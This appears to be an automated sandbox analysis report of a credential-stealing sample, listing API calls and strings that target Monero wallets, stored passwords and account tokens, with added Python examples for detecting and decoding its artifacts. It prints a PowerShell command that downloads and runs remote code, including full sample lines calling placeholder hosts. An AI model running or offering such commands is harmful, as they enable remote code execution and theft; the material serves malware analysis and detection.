                          • lstrlen.KERNEL32(?), ref: 0061135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00611377
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 00628B60: GetSystemTime.KERNEL32(00630E1A,0111A3C0,006305AE,?,?,006113F9,?,0000001A,00630E1A,00000000,?,01119148,?,\Monero\wallet.keys,00630E17), ref: 00628B86
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00611465
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006199EC
                            • Part of subcall function 006199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00619A11
                            • Part of subcall function 006199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00619A31
                            • Part of subcall function 006199C0: ReadFile.KERNEL32(000000FF,?,00000000,0061148F,00000000), ref: 00619A5A
                            • Part of subcall function 006199C0: LocalFree.KERNEL32(0061148F), ref: 00619A90
                            • Part of subcall function 006199C0: CloseHandle.KERNEL32(000000FF), ref: 00619A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 006114EF
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: df779f56f1a66327504d34cc3f2cc079143c4a0372ef39ca8c930c8ec1502322
                          • Instruction ID: b1da198a7c2aac23f9b128bfc0443d6180a96ecd65c1212d78d558f4d46db6a4
                          • Opcode Fuzzy Hash: df779f56f1a66327504d34cc3f2cc079143c4a0372ef39ca8c930c8ec1502322
                          • Instruction Fuzzy Hash: 705159B1D5052957CB55FB60EC92FED733EAF54300F40459CB60A62082EE746B89CFAA
                          APIs
                            • Part of subcall function 006172D0: memset.MSVCRT ref: 00617314
                            • Part of subcall function 006172D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0061733A
                            • Part of subcall function 006172D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006173B1
                            • Part of subcall function 006172D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0061740D
                            • Part of subcall function 006172D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00617452
                            • Part of subcall function 006172D0: HeapFree.KERNEL32(00000000), ref: 00617459
                          • lstrcat.KERNEL32(00000000,006317FC), ref: 00617606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00617648
                          • lstrcat.KERNEL32(00000000, : ), ref: 0061765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0061768F
                          • lstrcat.KERNEL32(00000000,00631804), ref: 006176A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006176D3
                          • lstrcat.KERNEL32(00000000,00631808), ref: 006176ED
                          • task.LIBCPMTD ref: 006176FB
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: :
                          • API String ID: 3191641157-3653984579
                          • Opcode ID: 3e02378609bc16e0b5d0eb61271acef22b390dfe98c58d665de0bbb154a968f3
                          • Instruction ID: b7a14c5fb3195f888bdfb38527863782e565f213b3efcd0791551a4b26965461
                          • Opcode Fuzzy Hash: 3e02378609bc16e0b5d0eb61271acef22b390dfe98c58d665de0bbb154a968f3
                          • Instruction Fuzzy Hash: DA314572900209EFCB48EBF4DC96DFF77BABB54302F184118F102A7150DA38A986CB95
                          APIs
                          • memset.MSVCRT ref: 00617314
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0061733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006173B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0061740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00617452
                          • HeapFree.KERNEL32(00000000), ref: 00617459
                          • task.LIBCPMTD ref: 00617555
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: Password
                          • API String ID: 2808661185-3434357891
                          • Opcode ID: 146ad454b5422c95d7177e5dcfa780b126ce4a59dd4064a66ed5ba66be2f1262
                          • Instruction ID: e3d60dca97d9b864a8f76ea3a7627dd512c42b65782a29d01ea653571298313f
                          • Opcode Fuzzy Hash: 146ad454b5422c95d7177e5dcfa780b126ce4a59dd4064a66ed5ba66be2f1262
                          • Instruction Fuzzy Hash: 58612AB580426C9BDB24DB50CC51BD9B7B9BF48300F0481E9E689A6241EF746BC9CFA4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0111E0E0,00000000,?,00630E2C,00000000,?,00000000), ref: 00628130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00628137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00628158
                          • __aulldiv.LIBCMT ref: 00628172
                          • __aulldiv.LIBCMT ref: 00628180
                          • wsprintfA.USER32 ref: 006281AC
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: fba0dcf1efcaa87842a644839b7be4f1df8a3b8ab3376d9c9e8b643638f9342b
                          • Instruction ID: 4f7b030446f2db86d9b4aef1193f157752b44604807111064fcb09d09f50ad36
                          • Opcode Fuzzy Hash: fba0dcf1efcaa87842a644839b7be4f1df8a3b8ab3376d9c9e8b643638f9342b
                          • Instruction Fuzzy Hash: FA213BB1E44718ABDB04DFD4DC4AFAEB7B9FB44B01F204219F605BB280C77869018BA5
                          APIs
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00614839
                            • Part of subcall function 006147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00614849
                          • InternetOpenA.WININET(00630DF7,00000001,00000000,00000000,00000000), ref: 0061610F
                          • StrCmpCA.SHLWAPI(?,0111E858), ref: 00616147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0061618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006161B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 006161DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0061620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00616249
                          • InternetCloseHandle.WININET(?), ref: 00616253
                          • InternetCloseHandle.WININET(00000000), ref: 00616260
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: 24eb32c1b665959e34a1c4ffca3fee8b656c8c640bd7dffca347e02eb2e01c22
                          • Instruction ID: 8e921aff2de7d59f7fe509e0f8e4132f7f1a06aee8925919792ddc59369431b9
                          • Opcode Fuzzy Hash: 24eb32c1b665959e34a1c4ffca3fee8b656c8c640bd7dffca347e02eb2e01c22
                          • Instruction Fuzzy Hash: D45141B5900218ABDB24DFA0DC45BEE77BAFB48701F108198F605A71C1DBB46B85CF95
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                          • lstrlen.KERNEL32(00000000), ref: 0061BC9F
                            • Part of subcall function 00628E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00628E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0061BCCD
                          • lstrlen.KERNEL32(00000000), ref: 0061BDA5
                          • lstrlen.KERNEL32(00000000), ref: 0061BDB9
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 00dc0699e6dff8987cec83bb24dd68f7ee625ff1b42f3e5e7929ea128f3b9af4
                          • Instruction ID: c71bbb66fd0487c6e6b7cd932c49e980bf9778f6cc57ccfa8e2c927f1354c8de
                          • Opcode Fuzzy Hash: 00dc0699e6dff8987cec83bb24dd68f7ee625ff1b42f3e5e7929ea128f3b9af4
                          • Instruction Fuzzy Hash: F7B170719105189BDB48FBE0EC96EEE733ABF14300F44411CF506A6091EF786A49CFAA
                          APIs
                          Strings
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 6906ce3a6e6ff6f3c9e93a31d14b49c6b48b6aec5082a3271972b3d36050900c
                          • Instruction ID: aa1d5e312c54ff73e0d6cc7df8e3fa0abcd03d59348e38e2c8bef226ec68bf53
                          • Opcode Fuzzy Hash: 6906ce3a6e6ff6f3c9e93a31d14b49c6b48b6aec5082a3271972b3d36050900c
                          • Instruction Fuzzy Hash: FCF0583090831DEFD348AFE0E949B6CBF70FB08707F040298F64986390EA784B419B96
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00614FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00614FD1
                          • InternetOpenA.WININET(00630DDF,00000000,00000000,00000000,00000000), ref: 00614FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00615011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00615041
                          • InternetCloseHandle.WININET(?), ref: 006150B9
                          • InternetCloseHandle.WININET(?), ref: 006150C6
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00628426
                          • wsprintfA.USER32 ref: 00628459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0062847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0062848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00628499
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,0111E020,00000000,000F003F,?,00000400), ref: 006284EC
                          • lstrlen.KERNEL32(?), ref: 00628501
                          • RegQueryValueExA.ADVAPI32(00000000,0111DED0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00630B34), ref: 00628599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00628608
                          • RegCloseKey.ADVAPI32(00000000), ref: 0062861A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006276A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 006276AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0110BF30,00000000,00020119,00000000), ref: 006276DD
                          • RegQueryValueExA.ADVAPI32(00000000,0111DE88,00000000,00000000,?,000000FF), ref: 006276FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00627708
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00627734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0062773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0110BF30,00000000,00020119,006276B9), ref: 0062775B
                          • RegQueryValueExA.ADVAPI32(006276B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0062777A
                          • RegCloseKey.ADVAPI32(006276B9), ref: 00627784
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          APIs
                          • CreateFileA.KERNEL32(:b,80000000,00000003,00000000,00000003,00000080,00000000,?,00623AEE,?), ref: 006292FC
                          • GetFileSizeEx.KERNEL32(000000FF,:b), ref: 00629319
                          • CloseHandle.KERNEL32(000000FF), ref: 00629327
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID: :b$:b
                          • API String ID: 1378416451-696514854
                          APIs
                          • memset.MSVCRT ref: 006240D5
                          • RegOpenKeyExA.ADVAPI32(80000001,0111DC20,00000000,00020119,?), ref: 006240F4
                          • RegQueryValueExA.ADVAPI32(?,0111E3F8,00000000,00000000,00000000,000000FF), ref: 00624118
                          • RegCloseKey.ADVAPI32(?), ref: 00624122
                          • lstrcat.KERNEL32(?,00000000), ref: 00624147
                          • lstrcat.KERNEL32(?,0111E3C8), ref: 0062415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValuememset
                          • String ID:
                          • API String ID: 2623679115-0
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006199EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00619A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00619A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,0061148F,00000000), ref: 00619A5A
                          • LocalFree.KERNEL32(0061148F), ref: 00619A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00619A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Similarity
                          • API ID: String___crt$Typememset
                          • String ID:
                          • API String ID: 3530896902-3916222277
                          APIs
                          • lstrcat.KERNEL32(?,0111E1B8), ref: 006247DB
                            • Part of subcall function 00628DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00628E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00624801
                          • lstrcat.KERNEL32(?,?), ref: 00624820
                          • lstrcat.KERNEL32(?,?), ref: 00624834
                          • lstrcat.KERNEL32(?,0110B9F0), ref: 00624847
                          • lstrcat.KERNEL32(?,?), ref: 0062485B
                          • lstrcat.KERNEL32(?,0111DCC0), ref: 0062486F
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 00628D90: GetFileAttributesA.KERNEL32(00000000,?,00611B54,?,?,0063564C,?,?,00630E1F), ref: 00628D9F
                            • Part of subcall function 00624570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00624580
                            • Part of subcall function 00624570: RtlAllocateHeap.NTDLL(00000000), ref: 00624587
                            • Part of subcall function 00624570: wsprintfA.USER32 ref: 006245A6
                            • Part of subcall function 00624570: FindFirstFileA.KERNEL32(?,?), ref: 006245BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00622D85
                          Strings
                          • <, xrefs: 00622D39
                          • ')", xrefs: 00622CB3
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00622D04
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00622CC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: d2c6c227b6d2a05191401b8d7ce0c54e231b19f676802a418b8ba729c6530a1b
                          • Instruction ID: 6a12e08db6a697900017118d671f77bbe0a88806f397dd09b56be44578f3b9a4
                          • Opcode Fuzzy Hash: d2c6c227b6d2a05191401b8d7ce0c54e231b19f676802a418b8ba729c6530a1b
                          • Instruction Fuzzy Hash: AD41CD71D106189BDB54EBE0E892BDDBB76AF14300F40411DE006A7191DFB46A8ACF9A
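The function above concatenates the three literals listed under Strings (the SysWOW64 powershell.exe path, `-nop -c "iex(New-Object Net.WebClient).DownloadString('`, and the closing `')"`) around a URL the report does not show, then hands the result to ShellExecuteEx. The following Python is an added detection example, not part of the Joe Sandbox report or of the sample: it scores process-creation events for that download-and-execute cradle and pulls out the URL. The three events are constructed; the URL in the first one is a placeholder standing in for the elided address, and the SysWOW64 heuristic is this example's own assumption (a 32-bit loader hardcoding the 32-bit host path), not something the report states.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed process-creation events (Sysmon Event ID 1 style); not taken from the report.
# Event 0 reproduces the command line the report's string fragments assemble; the URL is a
# placeholder because the report elides the downloaded address.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\Users\victim\Desktop\file.exe",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')"''',
    },
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    },
    {
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''powershell -NoP -W Hidden -C "IEX (New-Object System.Net.WebClient).DownloadString('https://203.0.113.20/a')"''',
    },
]

# iex / Invoke-Expression fed by WebClient.DownloadString, DownloadData or DownloadFile,
# with or without the "System." prefix and with arbitrary spacing between the parts.
CRADLE_RE = re.compile(
    r"(?:\biex\b|invoke-expression).*?new-object\s+(?:system\.)?net\.webclient\)?"
    r"\.download(?:string|data|file)\(",
    re.IGNORECASE | re.DOTALL,
)
URL_RE = re.compile(r"download(?:string|data|file)\(\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


@dataclass
class Finding:
    parent: str
    command_line: str
    url: Optional[str]
    indicators: List[str] = field(default_factory=list)


def analyze_event(event: dict) -> Optional[Finding]:
    """Return a Finding when the event is a PowerShell download-and-execute cradle, else None."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    if "powershell" not in image and "powershell" not in cmd.lower():
        return None
    if not CRADLE_RE.search(cmd):
        return None
    indicators = ["download-and-execute cradle: iex + WebClient.Download*"]
    # -nop / -NoProfile: profile scripts (and any logging they hook in) are skipped.
    if any(tok.startswith("-nop") for tok in cmd.lower().split()):
        indicators.append("-nop/-NoProfile: profile scripts skipped")
    if HIDDEN_RE.search(cmd):
        indicators.append("-WindowStyle Hidden")
    # Heuristic assumed by this example: a 32-bit host path on 64-bit Windows is what a
    # 32-bit loader gets when it hardcodes the PowerShell path, as the report's string does.
    if "syswow64" in image:
        indicators.append("32-bit PowerShell host (SysWOW64) spawned by the loader")
    m = URL_RE.search(cmd)
    return Finding(event.get("ParentImage", ""), cmd, m.group(1) if m else None, indicators)


def analyze_events(events) -> List[Finding]:
    return [f for f in map(analyze_event, events) if f is not None]


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f.parent, "->", f.url, f.indicators)
```

The second constructed event (a `-File` invocation without `iex`) is deliberately left unflagged: the signal is the in-memory fetch-and-evaluate pair, not PowerShell itself. The extracted URL is what a responder would block and pivot on; the report shows only the two halves of the string that wrap it.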
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00619F41
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 068be4b6e0b5c29062270f3d4763d29ce3147848f166f640f0fc210196a9e233
                          • Instruction ID: bf8320a8d6c513d966d7557860b4979170e3576ce27b408e036934567644a9ca
                          • Opcode Fuzzy Hash: 068be4b6e0b5c29062270f3d4763d29ce3147848f166f640f0fc210196a9e233
                          • Instruction Fuzzy Hash: F3615F70A00258ABDB64EFA4DC96FED7776AF45304F048018F90A5F181EBB46A46CB96
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • memset.MSVCRT ref: 0062716A
                          Strings
                          • sb, xrefs: 006272AE, 00627179, 0062717C
                          • sb, xrefs: 00627111
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0062718C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemset
                          • String ID: sb$sb$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 4047604823-3334931456
                          • Opcode ID: ad23d17b63413c828a358a4f13c4fcf7f3597f919f95f48500d70892adfce2ee
                          • Instruction ID: 1e2f94d168b2210a52793d2b5d448fc32dba647d028fa9a4df3ab23d70b84ff8
                          • Opcode Fuzzy Hash: ad23d17b63413c828a358a4f13c4fcf7f3597f919f95f48500d70892adfce2ee
                          • Instruction Fuzzy Hash: 5E516EB0D04628DBDB64EB90EC95FEEB376AF54304F2440ACE50566281EB746E88CF59
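The long string listed under Strings for this function (xref 0062718C) is a space-separated hex dump of printable ASCII. The following Python is an added example, not part of the report or of the sample, that takes that string exactly as printed and decodes it layer by layer: hex to ASCII gives an unpadded base64 text, and base64 gives a JSON object, `{ "typ": "JWT", "alg": "EdDSA" }`. The example only shows what the bytes decode to; what the sample does with a JWT header is not stated by the report and is not claimed here.

```python
import base64
import binascii
import json

# The hex string exactly as the report lists it under Strings for this function.
REPORT_HEX = (
    "65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 "
    "4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30"
)


def hex_to_ascii(spaced_hex: str) -> str:
    """Turn 'XX XX ...' into the bytes it encodes and decode them as ASCII."""
    raw = binascii.unhexlify(spaced_hex.replace(" ", ""))
    return raw.decode("ascii")


def b64_decode_unpadded(text: str) -> bytes:
    """Base64-decode text whose '=' padding was dropped, as in-memory strings often are."""
    text = text.strip()
    text += "=" * (-len(text) % 4)
    return base64.b64decode(text, validate=True)


def decode_report_string(spaced_hex: str) -> dict:
    """Full chain used on the report's string: hex dump -> ASCII -> base64 -> JSON object."""
    ascii_layer = hex_to_ascii(spaced_hex)
    decoded = b64_decode_unpadded(ascii_layer).decode("utf-8")
    return json.loads(decoded)


if __name__ == "__main__":
    print(hex_to_ascii(REPORT_HEX))
    print(decode_report_string(REPORT_HEX))
```

The 43-character base64 layer needs one padding byte restored before a strict decoder accepts it; the helper computes the padding rather than hardcoding it so the same chain applies to other strings of this shape found in the dump.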
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00627E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00627E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0110C320,00000000,00020119,?), ref: 00627E5E
                          • RegQueryValueExA.ADVAPI32(?,0111DC80,00000000,00000000,000000FF,000000FF), ref: 00627E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00627E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 63b4f0838f16e9afe5089529017587582f216d28de1a8e6e4a619e17fb49d990
                          • Instruction ID: ca45c3fe0ea9eabc3ceeaaad92b1a28fe63b3528decb24f8aaaff76b66b51ecf
                          • Opcode Fuzzy Hash: 63b4f0838f16e9afe5089529017587582f216d28de1a8e6e4a619e17fb49d990
